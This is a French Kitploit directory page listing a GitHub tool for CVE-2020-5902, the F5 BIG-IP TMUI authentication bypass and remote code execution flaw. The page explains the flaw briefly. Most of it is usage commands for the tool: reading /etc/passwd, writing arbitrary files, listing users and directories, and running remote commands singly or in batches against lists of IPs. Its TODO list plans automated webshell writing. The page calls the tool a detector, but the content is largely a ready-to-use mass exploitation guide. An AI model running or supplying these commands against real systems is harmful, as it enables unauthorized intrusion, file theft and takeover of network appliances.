Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
f5-bigip-rce-cve-2020-5902 — Outil de vérification automatique de la RCE CVE-2020-5902 sur F5 BIG-IP | Kitploit
Outils/GitHubGitHub/thelsa/f5-bigip-rce-cve-2020-5902
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et Contrôle
GitHubthelsa/f5-bigip-rce-cve-2020-5902

f5-bigip-rce-cve-2020-5902

Outil de vérification automatique de la RCE CVE-2020-5902 sur F5 BIG-IP

Voir le dépôt
6217il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Outil de détection de la vulnérabilité F5 BIG-IP RCE (CVE-2020-5902)

Résumé

Le 6 juillet 2020, la vulnérabilité RCE TMUI de F5 BIG-IP a été divulguée en ligne.

Le composant TMUI (interface utilisateur de gestion du trafic) de F5 BIG-IP présente une vulnérabilité de contournement de l'authentification. Celle-ci réside dans une divergence entre l'URL analysée par Tomcat et request.getPathInfo(), ce qui permet de contourner la vérification des autorisations, d'accéder sans authentification à toutes les fonctionnalités du module TMUI, puis de lire/écrire des fichiers arbitraires et d'exécuter des commandes, etc.

Pour plus de détails, voir Reproduction de la vulnérabilité RCE TMUI de F5 BIG-IP (CVE-2020-5902) et points d'attention

Cet outil prend en charge la détection sur IP unique et par lot. Il permet la lecture/écriture de fichiers, le listage des utilisateurs authentifiés, le listage de répertoires, l'exécution de commandes à distance et la détection du contournement de l'authentification hsqldb.

Démarrage rapide

pip install requests

hlep

python f5-bigip-rce-cve-2020-5902.py -h

vérification poc

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --check

vérification poc par lot

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --check -t 20 -s 10

lecture de fichier

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --fileread "/etc/passwd"

écriture de fichier

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --filepath "/tmp/xxx.txt" --filecontent "x"

listage des utilisateurs authentifiés

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --list-users

listage de répertoire

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --listdir "/tmp/"

RCE

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --rce id --still-exploit

RCE par lot

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --rce whoami --still-exploit -s 15 -t 20

vérification du contournement hsqldb

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --bypass-hsqldb

vérification par lot du contournement hsqldb

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --bypass-hsqldb

Remarque

Pour les IP traitées par lot, ajoutez de préférence http:// ou https:// au début ; si aucun protocole n'est précisé, http:// sera ajouté par défaut.

Si les conditions le permettent, il est recommandé d'ajouter le paramètre --still-exploit : même si la commande list auth user échoue, la RCE est malgré tout exécutée, ce qui augmente le taux de réussite.

TODO

  1. Envoyer plusieurs requêtes pour augmenter le taux de réussite en mode batch, en tenant compte du compromis sur l'efficacité.

  2. Intégrer l'exploitation de la désérialisation de l'interface hsqldb.

  3. Ajouter l'écriture automatisée de webshell.

Retour

issus
lsablog
gmail : [email protected]
qq : [email protected]

Télécharger l’outil